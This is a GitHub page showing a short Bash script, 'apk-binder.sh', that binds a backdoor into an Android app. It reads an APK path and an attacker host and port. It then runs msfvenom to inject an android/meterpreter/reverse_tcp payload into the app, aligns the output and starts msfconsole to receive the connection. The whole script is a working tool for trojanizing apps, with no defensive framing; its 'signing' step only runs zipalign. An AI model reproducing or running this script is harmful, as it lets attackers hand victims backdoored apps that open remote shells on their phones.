-
Notifications
You must be signed in to change notification settings - Fork 24
/
Copy pathapk-binder.sh
38 lines (35 loc) · 2.81 KB
/
apk-binder.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#Author - github.com/kinghacker0
#Credit - Give me credit if you use any part of script
clear
#Banner Start
echo -e "\e[31m \e[0m"
echo -e "\e[31m ▄▄▄ ██▓███ ██ ▄█▀ ▄▄▄▄ ██▓ ███▄ █ ▓█████▄ ▓█████ ██▀███ \e[0m";
echo -e "\e[31m▒████▄ ▓██░ ██▒ ██▄█▒ ▓█████▄ ▓██▒ ██ ▀█ █ ▒██▀ ██▌▓█ ▀ ▓██ ▒ ██▒\e[0m";
echo -e "\e[31m▒██ ▀█▄ ▓██░ ██▓▒▓███▄░ ▒██▒ ▄██▒██▒▓██ ▀█ ██▒░██ █▌▒███ ▓██ ░▄█ ▒\e[0m";
echo -e "\e[31m░██▄▄▄▄██ ▒██▄█▓▒ ▒▓██ █▄ ▒██░█▀ ░██░▓██▒ ▐▌██▒░▓█▄ ▌▒▓█ ▄ ▒██▀▀█▄ \e[0m";
echo -e "\e[31m ▓█ ▓██▒▒██▒ ░ ░▒██▒ █▄░▓█ ▀█▓░██░▒██░ ▓██░░▒████▓ ░▒████▒░██▓ ▒██▒\e[0m";
echo -e "\e[31m ▒▒ ▓▒█░▒▓▒░ ░ ░▒ ▒▒ ▓▒░▒▓███▀▒░▓ ░ ▒░ ▒ ▒ ▒▒▓ ▒ ░░ ▒░ ░░ ▒▓ ░▒▓░\e[0m";
echo -e "\e[31m ▒ ▒▒ ░░▒ ░ ░ ░▒ ▒░▒░▒ ░ ▒ ░░ ░░ ░ ▒░ ░ ▒ ▒ ░ ░ ░ ░▒ ░ ▒░\e[0m";
echo -e "\e[31m ░ ▒ ░░ ░ ░░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ \e[0m";
echo -e "\e[31m ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ \e[0m";
echo -e "\e[31m ░ ░ \e[0m";
echo -e " Author = github.com/kinghacker0 "
echo -e "\e[34m Website = hackersking.in \e[0m "
echo -e "\e[49m \e[2m"
#Bind Backdoor
read -p "[*]Enter filepath of apk#~: " path
read -p "[*]Enter output payload name#~: " payload
read -p "[*]Enter lhost#~: " lhost
read -p "[*]Enter lport#~: " lport
echo -e "\e[31m[*]Reverse Engineering Started..;p\e[0m"
msfvenom -x $path -p android/meterpreter/reverse_tcp lhost=$lhost lport=$lport R> binded.apk
#Signing the apk
echo -e "\e[31m \e[2m"
echo -e "[-]Signing the apk "
zipalign -v 4 binded.apk binded-signed.apk
#listner start
rm binded.apk && mv binded-signed.apk $payload.apk
echo -e "\e[34m \e[2m";
read -p "[-]Start listner(Enter) or Close (Ctrl+c) : " listner
msfconsole
#Changing this banner doesn't make you programmer..!"